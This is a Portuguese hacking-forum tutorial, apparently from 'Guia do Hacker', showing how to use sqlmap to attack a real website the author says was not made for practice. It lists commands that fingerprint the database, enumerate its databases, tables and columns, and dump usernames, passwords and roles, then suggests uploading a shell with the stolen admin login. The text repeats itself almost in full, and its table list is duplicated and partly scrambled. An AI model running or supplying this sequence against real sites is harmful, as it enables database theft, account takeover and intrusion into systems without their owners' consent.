Isso é um simples tutorial onde se explora a vulnerabilidade sql injection com o sqlmap.
Os comandos ou parâmetros listados nesse tutorial são encontrados no:
Onde serão listados diferentes parâmetros interessantíssimos!
Um pouco sobre a ferramenta Sqlmap.
Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.
Bom vamos aos estudos.
Irei usar o sqlmap em um site que não foi criado para fins estudantis.
Lembrando que este site ao qual obtive tais informações foi comunicado ao admistrador e ao webmaster sobre vulnerabilidade para poder ser corrigida.
Onde:
--url = URL do site
-b = Pega o banner do DBMS (“Database Management System”, sistema gerenciador de banco de dados.)
Onde:
--current-db = Mostra o banco de dados que esta sendo usado
Mas para verificar todos os bancos de dados existentes:
Onde:
--dbs = lista todos os bancos de dados de DBMS.
Depois de obter os bancos de dados agora já podemos listar as tabelas.
Onde:
-D = Banco de dados alvo. (neste caso o banco de dados alvo é imopmarn_casas)
--tables = listar tabelas.
Obs: Houve um erro nessa preview o correto das tabelas são:
É importante sempre indicar o banco de dados alvo (-D) antes de listar as tabelas pois caso não faça isso (sem o –D) ele irá listar todas as tabelas de todos os bancos de dados.
Após ter conseguido achar as tabelas vamos então listar as colunas.
-T = Tabela alvo
--columns = Listar colunas.
Agora já com as tabelas e colunas listadas pode-se obter informações importantes do site alvo a partir das colunas que nos foi dada com:
Onde:
-T = tabela alvo
-C = Colunas alvo, ou seja pode ser mais de uma coluna a ser escolhida. Ex: ‘usuario,senha’ (sempre separados por virgula e abrindo e fechando com aspas simples ‘’).
--dump = obter, extrair dados (dumpeado dados).
Bom depois de extraídos os dados de usuário(adm) e senha do site alvo pode-se fazer o upload de uma shell.
Agradecimentos:
samukt e papaismurf
Seus tutorias estão otimos sobre o sqlmap.
Foi de onde veio a inspiração de fazer um para o Guia do Hacker.
Faça bom uso desse conteúdo.
Sua cabeça é seu guia.
O Guia do Hacker não é responsavel pelos seus atos!
Os comandos ou parâmetros listados nesse tutorial são encontrados no:
Código:
./sqlmap.py –h
Um pouco sobre a ferramenta Sqlmap.
Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.
Bom vamos aos estudos.
Irei usar o sqlmap em um site que não foi criado para fins estudantis.
Lembrando que este site ao qual obtive tais informações foi comunicado ao admistrador e ao webmaster sobre vulnerabilidade para poder ser corrigida.
Código:
./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -b
--url = URL do site
-b = Pega o banner do DBMS (“Database Management System”, sistema gerenciador de banco de dados.)
Código:
./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" --current-db
--current-db = Mostra o banco de dados que esta sendo usado
Mas para verificar todos os bancos de dados existentes:
Código:
./sqlmap.py --url " http://sitealvo.com.br/produto.php?time=6" --dbs
--dbs = lista todos os bancos de dados de DBMS.
Depois de obter os bancos de dados agora já podemos listar as tabelas.
Código:
./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -D imopmarn_casa --tables
-D = Banco de dados alvo. (neste caso o banco de dados alvo é imopmarn_casas)
--tables = listar tabelas.
Obs: Houve um erro nessa preview o correto das tabelas são:
badad.........=....fotos
badadbe.....=....peruibe
badadees....=....clientes
badades......=....cidades
badadis.......=....imoveis
bairros........=....bairros
basarios......=....usuarios
bastros.......=....rastros
badadbe.....=....peruibe
badadees....=....clientes
badades......=....cidades
badadis.......=....imoveis
bairros........=....bairros
basarios......=....usuarios
bastros.......=....rastros
É importante sempre indicar o banco de dados alvo (-D) antes de listar as tabelas pois caso não faça isso (sem o –D) ele irá listar todas as tabelas de todos os bancos de dados.
Após ter conseguido achar as tabelas vamos então listar as colunas.
Código:
./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -D imopmarn_casa –T usuários --columns
--columns = Listar colunas.
Agora já com as tabelas e colunas listadas pode-se obter informações importantes do site alvo a partir das colunas que nos foi dada com:
Código:
./sqlmap.py --url "http://sitealvo.com.br/produto.php?time=6" -D imopmarn_casa –T usuarios –C ‘usuario,senha,funcao’ --dump
-T = tabela alvo
-C = Colunas alvo, ou seja pode ser mais de uma coluna a ser escolhida. Ex: ‘usuario,senha’ (sempre separados por virgula e abrindo e fechando com aspas simples ‘’).
--dump = obter, extrair dados (dumpeado dados).
Bom depois de extraídos os dados de usuário(adm) e senha do site alvo pode-se fazer o upload de uma shell.
Agradecimentos:
samukt e papaismurf
Seus tutorias estão otimos sobre o sqlmap.
Foi de onde veio a inspiração de fazer um para o Guia do Hacker.
Faça bom uso desse conteúdo.
Sua cabeça é seu guia.
O Guia do Hacker não é responsavel pelos seus atos!
Comment